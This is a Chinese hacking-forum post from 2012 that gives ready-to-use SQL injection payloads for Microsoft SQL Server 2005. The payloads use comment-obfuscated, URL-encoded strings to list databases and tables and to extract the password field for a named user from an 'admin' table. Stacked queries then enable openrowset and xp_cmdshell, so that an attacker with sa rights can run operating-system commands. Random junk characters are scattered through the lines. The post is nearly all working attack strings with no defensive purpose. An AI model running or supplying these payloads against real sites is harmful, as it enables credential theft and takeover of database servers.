找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1947|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

: h+ s% Z- K" H! {
) C5 F' A6 J  A0 I& `$ e6 L
. v# T; s7 D% n* @3 P& w[Copy to clipboard]CODE:5 B9 D& i4 ?0 t. i
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--1 c- a$ h& V2 b* M. _
% S' s. s7 p, `5 F) T7 l/ Z3 R
爆表语句,somedb部份是所要列的数据库,红色数字1累加
! W$ n) r1 L+ ~7 m$ z4 B; i. J
" `. o0 `( {- u
% Q3 `. _9 h" A+ B8 {2 {3 n( M[Copy to clipboard]CODE:  S8 a. I6 a: O/ U. p" S2 ]
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--' G6 K9 J5 C; y: ]

! ?. Z- L( Y  M爆字段语句,爆表admin里user='icerover'的密码段
. D2 x2 a* u# w$ m/ \0 V2 U( v3 P6 z7 p4 u: |
! z* c, t2 `% o9 M' P, l
[Copy to clipboard]CODE:- M1 L+ [* t, E9 F/ y$ Z; s5 z- d% c
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--8 M% ]# [- M% O/ N: {) u7 |/ L

2 d" v5 a( i, D9 h9 S% }  vmssql2005默认没有开xp_cmdshell的,openrowset也不能用9 F4 t; H. j# p( l
如果是sa权限,可以这样来开启8 s  r# K1 U; Y
开启openrowset
7 N5 I+ }# d6 g% d% M( [$ _6 y
* V, Y3 k6 {4 ^  |; x4 e% T5 [; D  R& t: v# M( p1 y! K) {. C
[Copy to clipboard]CODE:
) \  B+ B( Z, `5 n/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--0 i' h1 |5 w; m/ \5 ~  d9 p1 n- B
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--. t' Z* a& C5 Y6 q% ^

3 H- V9 i5 S6 d0 Z% L* [3 G开启xp_cmdshell7 _  M; Y5 m" x6 K* @

& H2 J$ [# \: x& ?
: B1 O/ U7 a8 R: d- v1 \3 K! v[Copy to clipboard]CODE:: q# a8 f9 k9 Z6 K; }) `
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--) `+ P5 }9 X& P2 P/ U
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
3 G) u& y& `0 |1 z/ y/ p$ Z* r4 s  j. J
ok,over~~晚安" F: ]+ l- q* \& S* w. D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表